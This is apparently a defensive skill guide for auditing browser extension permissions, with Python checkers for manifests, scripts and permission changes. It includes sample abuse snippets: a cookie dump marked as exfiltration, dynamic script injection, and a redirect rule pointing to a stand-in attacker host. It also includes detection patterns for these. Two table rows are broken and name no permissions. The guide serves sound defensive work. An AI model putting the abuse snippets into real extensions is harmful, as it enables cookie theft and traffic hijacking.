Hacktricks-skills skill: browser-extension-permission-audit

Audit browser extension permissions and host_permissions for security vulnerabilities. Use this skill whenever analyzing Chrome/Firefox extensions, reviewing manifest.json files, investigating extension security, or pentesting browser extensions. Trigger on mentions of extension permissions, host_permissions, manifest analysis, extension security testing, or when examining potentially malicious browser extensions.

```bash
git clone https://github.com/abelrguezr/hacktricks-skills
```

Source file: `skills/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions/SKILL.MD`

# Browser Extension Permission Audit

A skill for analyzing browser extension permissions and identifying security vulnerabilities in Chrome/Firefox extensions.
## When to Use This Skill

Use this skill when:

- Analyzing a browser extension's `manifest.json` file
- Investigating potentially malicious extensions
- Pentesting browser extensions for security vulnerabilities
- Reviewing extension permissions for compliance
- Auditing extensions for excessive privilege requests
- Investigating extension-based attacks or data exfiltration
## Quick Start

```bash
# Analyze a manifest.json file
python scripts/analyze_manifest.py path/to/manifest.json

# Check for dangerous permission combinations
python scripts/check_risky_permissions.py path/to/manifest.json
```
## Understanding Extension Permissions

### `permissions` vs `host_permissions`

- `permissions` - Controls access to privileged browser APIs:
  - `storage` - Persistent key-value storage (can't be cleared without uninstalling)
  - `cookies` - Access to all browser cookies (credential theft risk)
  - `tabs` - Tab management and monitoring
  - `history` - Full browsing history access
  - `bookmarks` - Read all bookmarks
  - `clipboard` - Monitor clipboard for passwords
  - `geolocation` - Track user location
  - `webRequest` - Intercept and modify network requests
  - `scripting` - Execute arbitrary code in pages
  - `declarativeNetRequest` - Block/redirect traffic
- `host_permissions` - Controls which origins those APIs can access:
  - `"<all_urls>"` or `"*://*/*"` - Access to ALL websites (extremely dangerous)
  - `"http://*/*", "https://*/*"` - Same as above
  - Specific patterns like `"https://example.com/*"` - Limited scope
## Critical Permission Combinations

| Combination | Risk | Impact |
|---|---|---|
| `cookies` + broad host access | 🔴 Critical | Can steal auth cookies from any site |
| `scripting` + broad host access | 🔴 Critical | Can inject code into any page |
| `webRequest` + broad host access | 🔴 Critical | Can intercept/modify all traffic |
| Host access + `storage` + `tabs` | 🟠 High | Wallet drain pattern |
| + | 🟡 Medium | User profiling |
| + | 🟡 Medium | Privacy invasion |
## Audit Workflow

### Step 1: Extract and Parse Manifest

```bash
# If you have the extension package
unzip extension.crx -d extension/
cat extension/manifest.json | python scripts/analyze_manifest.py -
```
### Step 2: Identify Risky Permissions

Run the permission checker:

```bash
python scripts/check_risky_permissions.py manifest.json
```

This will flag:

- Overly broad `host_permissions`
- Dangerous API combinations
- MV3-specific risks (`declarativeNetRequestWithHostAccess`)
- Implicit privilege abuse patterns
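The checks this step describes, together with the combination table earlier on the page, as an added standalone example (not the repository's own `analyze_manifest.py` or `check_risky_permissions.py`): it folds MV2 host patterns and content-script match lists into one host set, marks broad host access, and applies the table's combinations. The function names, the severity labels and the three sample manifests are this example's own; the samples are constructed, not taken from real extensions.

```python
"""Flag risky permission / host_permissions combinations in a manifest.json.

Added example, not the hacktricks-skills scripts. Assumes the standard
MV2/MV3 manifest layout; the sample manifests below are constructed.
"""
import json
import sys

# Match patterns that grant access to every origin.
BROAD_HOST_PATTERNS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}

# Rules from the combination table: (required API permissions, severity, impact).
# Each fires only when the manifest also has broad host access.
BROAD_HOST_COMBOS = [
    ({"cookies"}, "CRITICAL", "cookies + broad host access: can steal auth cookies from any site"),
    ({"scripting"}, "CRITICAL", "scripting + broad host access: can inject code into any page"),
    ({"webRequest"}, "CRITICAL", "webRequest + broad host access: can intercept/modify all traffic"),
    ({"declarativeNetRequest"}, "HIGH", "declarativeNetRequest + broad host access: can block/redirect traffic on any site"),
    ({"storage", "tabs"}, "HIGH", "storage + tabs + broad host access: wallet-drain pattern"),
]
SEVERITY_ORDER = {"CRITICAL": 0, "HIGH": 1, "MEDIUM": 2}


def is_host_pattern(entry):
    """Host match patterns look like scheme://host/path or the <all_urls> alias;
    anything else in a permissions array is an API permission name."""
    return entry == "<all_urls>" or "://" in entry


def host_patterns(manifest):
    """Every origin pattern the extension asks for, regardless of manifest version.
    MV2 lists host patterns inside "permissions"; MV3 moves them to
    "host_permissions". Content-script "matches" lists grant access to those
    origins as well, so they are counted too."""
    patterns = set(manifest.get("host_permissions", []))
    patterns.update(p for p in manifest.get("permissions", []) if is_host_pattern(p))
    for script in manifest.get("content_scripts", []):
        patterns.update(script.get("matches", []))
    return patterns


def api_permissions(manifest):
    """API permissions only (host patterns stripped out, which matters for MV2)."""
    return {p for p in manifest.get("permissions", []) if not is_host_pattern(p)}


def broad_hosts(manifest):
    """The subset of requested host patterns that cover every site."""
    return sorted(p for p in host_patterns(manifest) if p in BROAD_HOST_PATTERNS)


def audit(manifest):
    """Return (severity, message) findings, most severe first."""
    findings = []
    perms = api_permissions(manifest)
    broad = broad_hosts(manifest)
    if broad:
        findings.append(("HIGH", "broad host access: " + ", ".join(broad)))
        for needed, severity, message in BROAD_HOST_COMBOS:
            if needed <= perms:
                findings.append((severity, message))
    if "declarativeNetRequestWithHostAccess" in perms:
        findings.append(("HIGH", "declarativeNetRequestWithHostAccess: MV3 host access "
                                 "via rules with a weaker install prompt"))
    findings.sort(key=lambda f: SEVERITY_ORDER[f[0]])
    return findings


# Constructed samples (not real extensions).
OVERPRIVILEGED_MV3 = {
    "manifest_version": 3, "name": "constructed sample",
    "permissions": ["cookies", "storage", "tabs", "scripting"],
    "host_permissions": ["<all_urls>"],
}
LIMITED_MV3 = {
    "manifest_version": 3, "name": "constructed sample",
    "permissions": ["storage", "activeTab"],
    "host_permissions": ["https://example.com/*"],
}
LEGACY_MV2 = {
    "manifest_version": 2, "name": "constructed sample",
    "permissions": ["cookies", "http://*/*", "https://*/*"],
}

if __name__ == "__main__":
    # Usage: python audit_manifest.py manifest.json   (or "-" to read stdin)
    source = sys.stdin if len(sys.argv) < 2 or sys.argv[1] == "-" else open(sys.argv[1])
    with source:
        data = json.load(source)
    for severity, message in audit(data) or [("INFO", "no risky combinations found")]:
        print(f"[{severity}] {message}")
```

It reads a path or `-` for stdin, matching the Step 1 pipeline, and `audit()` returns its findings so other tooling can import it. The MV2 handling is the part worth keeping: in a `manifest_version` 2 file, `cookies` and `http://*/*` sit side by side in `permissions`, so a checker that only reads `host_permissions` would report no host access at all.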
### Step 3: Analyze Runtime Behavior

Check for these abuse patterns:

Cookie Theft:

```javascript
// Look for this pattern in background scripts
chrome.cookies.getAll({}, function(cookies) {
  // Exfiltration attempt
});
```

Dynamic Script Injection:

```javascript
// Dangerous: arbitrary code execution
chrome.tabs.executeScript(tabId, {code: maliciousCode});  // MV2 API
chrome.scripting.executeScript({func: maliciousFunc});    // MV3 API
```

Traffic Hijacking:

```javascript
// MV3 rule injection
chrome.declarativeNetRequest.updateDynamicRules({
  addRules: [{
    action: { type: "redirect", redirect: { url: "https://attacker.tld" } }
  }]
});
```
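A source-level triage pass for the three patterns above, added here as an example that is not part of the hacktricks-skills repository. It finds the relevant `chrome.*` calls in a background script, reads each call's full argument list (even when it spans several lines), and rates the call by what the arguments show: an empty `getAll` filter, a `code:`/`func:` argument to `executeScript`, or a `redirect` action in a dynamic rule. The `scan`/`classify` names and both sample scripts are constructed for this example.

```python
"""Point a reviewer at the runtime abuse patterns from Step 3 in extension JS.

Added example, not part of the hacktricks-skills repository. It is a source
heuristic: a hit means "read this call", not proof of malice. The sample
scripts are constructed.
"""
import re

# The chrome.* calls worth reading, as used in the patterns above.
CALL_RE = re.compile(
    r"chrome\.(cookies\.getAll|tabs\.executeScript|scripting\.executeScript"
    r"|declarativeNetRequest\.updateDynamicRules)\("
)


def call_args(text, open_idx):
    """Text between the '(' at open_idx and its matching ')', so a rule can
    inspect the whole argument list even when it spans several lines."""
    depth = 0
    for i in range(open_idx, len(text)):
        if text[i] == "(":
            depth += 1
        elif text[i] == ")":
            depth -= 1
            if depth == 0:
                return text[open_idx + 1:i]
    return text[open_idx + 1:]  # unbalanced source: take the rest


def classify(api, args):
    """Severity and note for one call, based on its arguments."""
    if api == "cookies.getAll":
        if re.match(r"\s*\{\s*\}", args):
            return "CRITICAL", "cookie dump: getAll with an empty filter reads every cookie"
        return "HIGH", "cookie read: check what the callback does with the cookies"
    if api.endswith("executeScript"):
        if re.search(r"\b(?:code|func)\s*:", args):
            return "CRITICAL", "dynamic code injection (code:/func:) into pages"
        return "MEDIUM", "injects packaged file(s): review the injected script"
    if re.search(r"type\s*:\s*[\"']redirect[\"']", args):
        return "HIGH", "dynamic redirect rule: traffic hijacking"
    return "MEDIUM", "dynamic declarativeNetRequest rules: review their actions"


def scan(source):
    """Return (line, api, severity, note) for each call of interest."""
    findings = []
    for match in CALL_RE.finditer(source):
        api = match.group(1)
        args = call_args(source, match.end() - 1)   # end() - 1 is the '('
        line = source.count("\n", 0, match.start()) + 1
        severity, note = classify(api, args)
        findings.append((line, api, severity, note))
    return findings


SUSPICIOUS_JS = """\
// constructed sample: background script of a suspicious extension
chrome.cookies.getAll({}, function (cookies) {
  // exfiltration would follow here
});
chrome.tabs.executeScript(tabId, { code: payload });
chrome.declarativeNetRequest.updateDynamicRules({
  addRules: [{
    id: 1, priority: 1,
    action: { type: "redirect", redirect: { url: "https://attacker.tld" } },
    condition: { urlFilter: "*", resourceTypes: ["main_frame"] }
  }]
});
"""

LIMITED_JS = """\
// constructed sample: a narrowly scoped extension
chrome.cookies.getAll({ domain: "example.com" }, listCookies);
chrome.scripting.executeScript({ target: { tabId: tab.id }, files: ["content.js"] });
"""

if __name__ == "__main__":
    for name, src in (("suspicious", SUSPICIOUS_JS), ("limited", LIMITED_JS)):
        print(f"== {name} ==")
        for line, api, severity, note in scan(src):
            print(f"  line {line}: [{severity}] chrome.{api}: {note}")
```

A hit is a place to read, not a verdict: `chrome.cookies.getAll` with a domain filter has legitimate uses, and an extension can assemble the same calls through string concatenation or a minified bundle that the regex will not see, so pair this with the manifest check and with the runtime inspection pages listed under Reference Commands.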
### Step 4: Check for Supply Chain Risks

- Verify extension signature and publisher
- Check update history for sudden permission changes
- Look for `declarativeNetRequestWithHostAccess` (weaker install prompt)
- Review Web Store API key usage patterns
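The "sudden permission changes" check from this step, which is also what the security-team recommendation to watch for permission escalations comes down to, as an added example that is not part of the repository: it diffs two manifest versions and rates the escalation, treating the arrival of `<all_urls>` together with `scripting` or `declarativeNetRequest` (the trojanized-update pattern listed under Common Abuse Patterns) as the worst case. The `permission_delta` name, the severity scale, the `SENSITIVE_APIS` list and the two sample versions are this example's own.

```python
"""Diff two versions of an extension's manifest and rate the permission change.

Added example, not part of the hacktricks-skills repository; it assumes both
manifests are MV2 or MV3 JSON objects. The two sample versions are constructed
to mirror the trojanized-update pattern described on this page.
"""
import json

BROAD_HOST_PATTERNS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
# Permissions whose appearance in an update deserves a hard look (this example's list).
SENSITIVE_APIS = {"cookies", "scripting", "webRequest", "declarativeNetRequest",
                  "declarativeNetRequestWithHostAccess", "history", "tabs"}


def grants(manifest):
    """Split a manifest into (API permissions, host patterns) for MV2 or MV3."""
    listed = set(manifest.get("permissions", []))
    hosts = {p for p in listed if p == "<all_urls>" or "://" in p}   # MV2 style
    hosts |= set(manifest.get("host_permissions", []))               # MV3 style
    return listed - hosts, hosts


def permission_delta(old, new):
    """What an update added, plus a severity for the escalation."""
    old_apis, old_hosts = grants(old)
    new_apis, new_hosts = grants(new)
    added_apis = sorted(new_apis - old_apis)
    added_hosts = sorted(new_hosts - old_hosts)
    # Broad host access is only an escalation if the old version did not have it.
    gained_broad = not (old_hosts & BROAD_HOST_PATTERNS) and bool(new_hosts & BROAD_HOST_PATTERNS)
    sensitive = sorted(set(added_apis) & SENSITIVE_APIS)

    if gained_broad and sensitive:
        severity = "CRITICAL"   # <all_urls> arriving together with scripting/DNR/cookies
    elif gained_broad or "declarativeNetRequestWithHostAccess" in added_apis:
        severity = "HIGH"
    elif added_apis or added_hosts:
        severity = "MEDIUM"
    else:
        severity = "NONE"
    return {
        "versions": (old.get("version"), new.get("version")),
        "added_permissions": added_apis,
        "added_host_patterns": added_hosts,
        "gained_broad_host_access": gained_broad,
        "sensitive_additions": sensitive,
        "severity": severity,
    }


# Constructed sample versions of one extension.
V1 = {"manifest_version": 3, "version": "1.4.0",
      "permissions": ["storage", "activeTab"],
      "host_permissions": ["https://example.com/*"]}
V2 = {"manifest_version": 3, "version": "1.5.0",
      "permissions": ["storage", "activeTab", "scripting", "declarativeNetRequest"],
      "host_permissions": ["<all_urls>"]}

if __name__ == "__main__":
    # Usage in practice: load the previous and current manifest.json from the
    # update history and pass them in the same order.
    print(json.dumps(permission_delta(V1, V2), indent=2))
```

Run against consecutive releases from the store's update history, a `CRITICAL` result on a previously narrow extension is exactly the signal the supply-chain step asks for; a `MEDIUM` result (one new API with no host widening) is routine and only needs a glance at the changelog.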
## Common Abuse Patterns

### 1. Supply-Chain Trojanized Updates

- Stolen developer accounts push MV3 updates
- Add `<all_urls>` + `declarativeNetRequest`/`scripting`
- Inject remote JS to siphon headers/DOM content

### 2. Wallet Drains

- Host access + `storage` + `tabs`
- Backdoored wallet extensions exfiltrate seeds
- Stolen Web Store API keys ship malicious builds

### 3. Cookie Theft

- `cookies` + broad host access - Reads auth cookies despite `HttpOnly`
- Treat as credential-stealing capable

### 4. Implicit Privilege Abuse

- `tabs.create()` - Bypass popup blockers, create unlimited tabs
- `tabs.update()` - Modify existing tabs, load ads
- `data:` URIs in Chrome - Phishing attacks
- Webcam/microphone - One-time prompt, then always-on access
## Prevention Recommendations

### For Users

- Review permissions before installing extensions
- Use the `activeTab` permission when possible (user-initiated only)
- Check extension permissions regularly in browser settings
- Remove unused extensions immediately
- Be wary of extensions requesting `<all_urls>`

### For Developers

- Request the minimum necessary permissions
- Use `activeTab` for user-initiated actions
- Avoid `host_permissions` when possible
- Implement runtime permission requests for optional features
- Follow Google's policy: no excessive privileges

### For Security Teams

- Monitor extension update patterns
- Check for sudden permission escalations
- Audit `declarativeNetRequest` rules
- Review `chrome://extensions/?errors` for hidden issues
- Test with `chrome://extensions/?id=<id>` in developer mode
## Reference Commands

```text
# Chrome extension inspection
chrome://extensions/?id=<extension-id>
chrome://extensions/?errors

# Firefox extension inspection
about:debugging#/runtime/this-firefox

# View extension permissions
chrome://extensions/ (click extension → Details)
```
## Scripts

### `analyze_manifest.py`

Analyzes manifest.json and reports permission risks.

### `check_risky_permissions.py`

Checks for dangerous permission combinations and abuse patterns.